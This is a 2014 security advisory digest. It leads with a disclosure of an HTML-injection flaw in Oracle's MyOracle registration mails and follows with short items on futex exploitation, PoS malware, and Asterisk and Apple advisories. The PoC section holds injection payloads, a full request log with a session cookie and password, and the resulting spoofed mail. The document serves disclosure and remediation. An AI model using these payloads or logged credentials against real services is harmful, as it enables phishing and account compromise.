Channel: BOT24

Oracle Corporation MyOracle - Persistent Vulnerability

Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin@vulnerability-lab.com-001:2014

http://vulnerability-db.com/magazine/articles/2014/09/17/oracle-corporation-fixed-vulnerability-myoracle-online-service-application


Release Date:
=============
2014-09-17


Vulnerability Laboratory ID (VL-ID):
====================================
1261


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems and enterprise software products – particularly its own brands
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle's CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation `MyOracle` service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation and mail encoding web vulnerability has been discovered in the official Oracle Corporation `MyOracle` service web-application.
The vulnerability allows remote attackers to bypass the regular web/system validation and inject their own HTML/script code into the outgoing e-mails of the
account system's mail service.

The vulnerability is located in the name values of the MyOracle `registration` module. Remote attackers are able to inject their own script code into the
first-name and last-name input fields of the registration form via a POST request. The submitted registration triggers the account mail service notification,
which returns the injected code unencoded in the MyOracle token activation (account verification) mail. Because the name values are stored and re-used, every
later notification mail the MyOracle service sends for that account is affected as well. The injection point is either a profile update or the remote
registration itself. The server does not encode the stored values when it builds outgoing service mails, which is what makes the issue persistent. The attacker
is able to place their own (fake) verification links or manipulate the full mail body context of an otherwise legitimate Oracle mail (sender
oracle-acct_ww@oracle.com). The security risk of the persistent mail encoding and filter web vulnerability is estimated as medium with a CVSS (Common
Vulnerability Scoring System) count of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent
session hijacking attacks, unauthorized external redirects to malicious sources and persistent manipulation of the affected or connected module context.
Note that most mail clients do not execute JavaScript, so in practice the impact is HTML injection (iframes, images, links) into the mail body, i.e. phishing
from a trusted sender, rather than script execution in the recipient's client.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] MyOracle

Vulnerable Module(s):
                                [+] Registration (exp.)

Vulnerable Parameter(s):
                                [+] Profile name values (firstname & lastname ...)


[Sender]:
                                [+] oracle-acct_ww@oracle.com

[Receiver]:
                                [+] admin@evolution-sec.com & bkm@evolution-sec.com


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without a privileged application user account.
To reproduce the vulnerability for security demonstration purposes, follow the information and steps provided below.

Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com

Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com


Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3


Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~[...]


After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~[...]


-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv[...] Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content size[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv[...]
      Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv[...]s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST data:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv[...]
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]






PoC: Exploit code in the mail (captured verification mail, German locale)

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif" alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><font color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a 
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. 
Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif" alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>


Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">



Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png


Resource(s):
                                ../Account verifizieren.htm
                                ../Bitte verifizieren Sie Ihren Oracle Account.html
                                ../Bitte verifizieren Sie Ihren Oracle Account_poc.html
                                ../poc.txt


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable first-name and last-name input fields in the MyOracle application.
Encode the stored user data when it is read from the DBMS to build the service notification mails (sent from oracle-acct_ww@oracle.com) to prevent
persistent injection attacks. Output encoding at the point where the value is written into the HTML mail body is the essential fix; restricting the
characters accepted in the name fields at registration is an additional defence, not a replacement for it.
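The fix described above, output-encoding the stored name before it is placed into the notification mail, as an added example in Python. This is not Oracle's code: the mail template, the helper names and the tag-counting check are constructed here, and the payload is the givenname/sn value from the PoC request above after URL decoding.

```python
import html
import re

# Constructed sample: the givenname/sn value from the PoC request above,
# after URL-decoding.
PAYLOAD = '"><iframe src=a>%20"><img src="x">'

# Constructed stand-in for the notification mail template. The real one is
# the Oracle mail shown in the PoC; this is just enough to show the defect.
TEMPLATE = ('<td>Dear {name},<br><br>Please click the following link '
            'to verify your account.</td>')

# Matches any opening or closing HTML tag in the rendered mail.
TAG_RE = re.compile(r'</?[A-Za-z][^>]*>')


def render_vulnerable(name: str) -> str:
    """Interpolate the stored name as-is: the behaviour the advisory describes."""
    return TEMPLATE.format(name=name)


def render_fixed(name: str) -> str:
    """Encode the untrusted value at the point it enters the HTML mail body.

    html.escape turns < > & " ' into entities, so a stored name can never
    open or close a tag or break out of an attribute, whatever it contains.
    """
    return TEMPLATE.format(name=html.escape(name, quote=True))


def injected_tag_count(name: str, render) -> int:
    """Check: how many tags in the rendered mail come from the name value?

    Counts the tags in the output and subtracts those the template itself
    contributes; anything left over was smuggled in through the name.
    """
    baseline = len(TAG_RE.findall(TEMPLATE.format(name='')))
    return len(TAG_RE.findall(render(name))) - baseline


def name_is_plausible(name: str) -> bool:
    """Input-side check for the name fields: letters in any script, spaces and
    a few punctuation characters. Rejects anything carrying markup characters.
    This complements the output encoding above; it does not replace it."""
    return bool(name) and all(ch.isalpha() or ch in " -'." for ch in name)


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_fixed(PAYLOAD))
    print(injected_tag_count(PAYLOAD, render_vulnerable),
          injected_tag_count(PAYLOAD, render_fixed))
```

With the PoC payload the vulnerable renderer emits two extra tags (the iframe and the img), the encoded renderer emits none, and the name check rejects the payload while still accepting real names such as "Zoë O'Brien".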


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com               - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Escalating Futex

Last time we went over the two bugs in the futex kernel module and how these bugs allow us to potentially control a node in some kernel-residing linked list.

This time, we'll discuss how to leverage these bugs in order to achieve a limited form of kernel write, or to be more precise: "write an uncontrolled value to a controlled address".

more here............http://blog.nativeflow.com/escalating-futex

Announcing Keyless SSL™: All the Benefits of CloudFlare Without Having to Turn Over Your Private SSL Keys

CloudFlare is an engineering-driven company. This is a story we're proud of because it embodies the essence of who we are: when faced with a problem, we found a novel solution. Technical details to follow but, until then, welcome to the no hardware world.

more here.............http://blog.cloudflare.com/announcing-keyless-ssl-all-the-benefits-of-cloudflare-without-having-to-turn-over-your-private-ssl-keys/

The Post Exploitation Team

I often get asked about red team skills and training. What should each team member know how to do? For exercises or long running attack simulations, I believe it’s fruitful to put junior members into the post-exploitation role first. This post describes the post-exploitation team, where they fit into the overall engagement, and their core tasks and skills.

more here............http://blog.cobaltstrike.com/2014/09/18/once-you-own-a-network/

Let’s Talk About NewPosThings

NewPosThings is a point of sale (PoS) malware family that ASERT has been tracking for a few weeks. It operates similarly to other PoS malware by memory scraping processes looking for credit card track data and then exfiltrating the spoils to a command and control (C2) server. Based on compilation times, it has been in active development since at least October 20, 2013—with the latest timestamp being August 12, 2014. Since we haven’t come across any public details of this family, we’re releasing our malware analysis for posterity and to get ahead of the threat.


more here.............http://www.arbornetworks.com/asert/2014/09/lets-talk-about-newposthings/

AST-2014-010: Remote crash when handling out of call message in certain dialplan configurations

  Asterisk Project Security Advisory - AST-2014-010

         Product        Asterisk
         Summary        Remote crash when handling out of call message in
                        certain dialplan configurations
    Nature of Advisory  Remotely triggered crash of Asterisk
      Susceptibility    Remote authenticated sessions
         Severity       Minor
      Exploits Known    No
       Reported On      05 September 2014
       Reported By      Philippe Lindheimer
        Posted On       18 September 2014
     Last Updated On    September 18, 2014
     Advisory Contact   Matt Jordan <mjordan AT digium DOT com>
         CVE Name       Pending

    Description  When an out of call message - delivered by either the SIP
                 or PJSIP channel driver or the XMPP stack - is handled in
                 Asterisk, a crash can occur if the channel servicing the
                 message is sent into the ReceiveFax dialplan application
                 while using the res_fax_spandsp module.

                 Note that this crash does not occur when using the
                 res_fax_digium module.

                 While this crash technically occurs due to a configuration
                 issue, as attempting to receive a fax from a channel driver
                 that only contains textual information will never succeed,
                 the likelihood of having it occur is sufficiently high as
                 to warrant this advisory.

    Resolution  The fax family of applications have been updated to handle
                the Message channel driver correctly. Users using the fax
                family of applications along with the out of call text
                messaging features are encouraged to upgrade their versions
                of Asterisk to the versions specified in this security
                advisory.

                Additionally, users of Asterisk are encouraged to use a
                separate dialplan context to process text messages. This
                avoids issues where the Message channel driver is passed to
                dialplan applications that assume a media stream is
                available. Note that the various channel drivers and stacks
                provide such an option; an example being the SIP channel
                driver's outofcall_message_context option.
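The separate-context recommendation above, as an added configuration example. It is not part of the Digium advisory: the sip.conf option outofcall_message_context is the one the advisory names, while the pjsip.conf message_context option, the context names and the dialplan lines are assumptions made here for illustration.

```ini
; sip.conf: deliver out-of-call SIP MESSAGE requests to a dedicated text
; context instead of the endpoint's voice context (option named in the advisory).
[general]
outofcall_message_context = messages

; pjsip.conf: per-endpoint equivalent for the PJSIP stack
; (option name assumed here, not taken from the advisory).
[alice]
type = endpoint
context = from-internal
message_context = messages

; extensions.conf: the text-only context. Only applications that work on a
; Message channel run here, so a text message can never be handed to
; ReceiveFax() or any other application that assumes a media stream.
[messages]
exten => _[0-9a-z].,1,NoOp(Out-of-call message from ${MESSAGE(from)} to ${EXTEN}: ${MESSAGE(body)})
 same => n,MessageSend(sip:${EXTEN},${MESSAGE(from)})
 same => n,Hangup()

; voice context: fax and other media applications stay here, where a
; real channel with a media stream arrives.
[from-internal]
exten => fax,1,ReceiveFax(/var/spool/asterisk/fax/${UNIQUEID}.tif)
 same => n,Hangup()
```

The point of the split is that the Message channel driver never enters [from-internal], so the crash path in the advisory (a text-only channel reaching ReceiveFax with res_fax_spandsp) is closed by configuration even before the patched fax applications are installed.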

                               Affected Versions
                         Product                  Release Series
                  Asterisk Open Source                11.x        All versions
                  Asterisk Open Source                12.x        All versions
                   Certified Asterisk                 11.6        All versions

                                  Corrected In
                            Product                              Release
                     Asterisk Open Source                    11.12.1, 12.5.1
                      Certified Asterisk                       11.6-cert6

                                     Patches
   SVN URL                                                           Revision
   http://downloads.asterisk.org/pub/security/AST-2014-010-11.diff   Asterisk 11
   http://downloads.asterisk.org/pub/security/AST-2014-010-12.diff   Asterisk 12
   http://downloads.asterisk.org/pub/security/AST-2014-010-11.6.diff Certified Asterisk 11.6

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-24301

    Asterisk Project Security Advisories are posted at
    http://www.asterisk.org/security

    This document may be superseded by later versions; if so, the latest
    version will be posted at
    http://downloads.digium.com/pub/security/AST-2014-010.pdf and
    http://downloads.digium.com/pub/security/AST-2014-010.html

                                Revision History
          Date                  Editor                 Revisions Made
    September 18       Matt Jordan               Initial Draft

               Asterisk Project Security Advisory - AST-2014-010
              Copyright (c) 2014 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2014-009: Remote crash based on malformed SIP subscription requests

Asterisk Project Security Advisory - AST-2014-009

         Product        Asterisk
         Summary        Remote crash based on malformed SIP subscription
                        requests
    Nature of Advisory  Remotely triggered crash of Asterisk
      Susceptibility    Remote authenticated sessions
         Severity       Major
      Exploits Known    No
       Reported On      30 July, 2014
       Reported By      Mark Michelson
        Posted On       18 September, 2014
     Last Updated On    September 18, 2014
     Advisory Contact   Mark Michelson <mmichelson AT digium DOT com>
         CVE Name       Pending

    Description  It is possible to trigger a crash in Asterisk by sending a
                 SIP SUBSCRIBE request with unexpected mixes of headers for
                 a given event package. The crash occurs because Asterisk
                 allocates data of one type at one layer and then interprets
                 the data as a separate type at a different layer. The crash
                 requires that the SUBSCRIBE be sent from a configured
                 endpoint, and the SUBSCRIBE must pass any authentication
                 that has been configured.

                 Note that this crash is in Asterisk's PJSIP-based
                 res_pjsip_pubsub module and not in the old chan_sip module.

    Resolution  Type-safety has been built into the pubsub API where it
                previously was absent. A test has been added to the
                testsuite that previously would have triggered the crash.

                               Affected Versions
                        Product                  Release Series
                  Asterisk Open Source               1.8.x       Unaffected
                  Asterisk Open Source               11.x        Unaffected
                  Asterisk Open Source               12.x        12.1.0 and up
                   Certified Asterisk               1.8.15       Unaffected
                   Certified Asterisk                11.6        Unaffected

                                  Corrected In
                         Product                              Release
                  Asterisk Open Source                        12.5.1

                                    Patches
   SVN URL                                                           Revision
   http://downloads.asterisk.org/pub/security/AST-2014-009-12.diff   Asterisk 12

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-24136

    Asterisk Project Security Advisories are posted at
    http://www.asterisk.org/security

    This document may be superseded by later versions; if so, the latest
    version will be posted at
    http://downloads.digium.com/pub/security/AST-2014-009.pdf and
    http://downloads.digium.com/pub/security/AST-2014-009.html

                                Revision History
         Date            Editor                  Revisions Made
    19 August, 2014  Mark Michelson  Initial version of document

               Asterisk Project Security Advisory - AST-2014-009
              Copyright (c) 2014 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

CoreGraphics Information Disclosure - CVE-2014-4378

Apple's CoreGraphics library fails to validate input when parsing the colorspace specification of an inline image embedded in a PDF content stream. The issue is an information leak that improves the exploitability of any application linked against this library, enabling the bypass of exploit mitigations such as ASLR, DEP and code signing. In particular, this article explores the exploitability of MobileSafari on iOS 7.1.x: the bug makes it possible to leak information about the memory layout into the MobileSafari JavaScript environment using a crafted PDF file embedded as an image, improving the ability to exploit other issues.

more here...........http://blog.binamuse.com/2014/09/coregraphics-information-disclosure.html

Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw


                         VSR Security Advisory
                       http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
 Release Date: 2014-09-17
  Application: Apple iOS Foundation Framework
           Apple OS X Foundation Framework
     Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
     Severity: High
       Author: George D. Gal <ggal (at) vsecurity.com>
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
    Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
           http://support.apple.com/kb/HT1222

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-----------------~
- From [1]:
"Xcode includes software development kits (SDKs) that enable you to create
  applications that run on specific versions of iOS or OS X, including
  versions different from the one you are developing on. This technology
  lets you build a single binary that takes advantage of new features when
  running on a system that supports them, and gracefully degrades when
  running on an older system. Some Apple frameworks automatically modify
  their behavior based on the SDK an application is built against for
  improved compatibility."


Vulnerability Overview
~--------------------~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of the iOS
SDK whereby the NSXMLParser class resolves XML External Entities by default,
despite documentation which indicates otherwise. In addition, the settings that
change the behavior of XML External Entity resolution appear to be
non-functional.

This class of vulnerability, commonly known as an XXE (XML eXternal Entity)
attack, could allow an attacker to use the XML parser to carry out attacks
ranging from network port scanning and information disclosure to denial of
service and, potentially, remote file retrieval.

Further review also revealed that the Foundation Framework used in OS X
10.9.x is also vulnerable.

The severity of this vulnerability varies. For example, in situations where
the application does not reflect user-influenced XML, retrieval of files
may be limited; however, external HTTP entities could still be used to
conduct port scans. In other scenarios, if core iOS applications transmit XML
over plaintext protocols, these protocols could potentially be intercepted
to leak the contents of any file on the mobile device. For App Store
applications, the files which could be accessed may be limited to those under
the individual chrooted application directories, or, in the case of
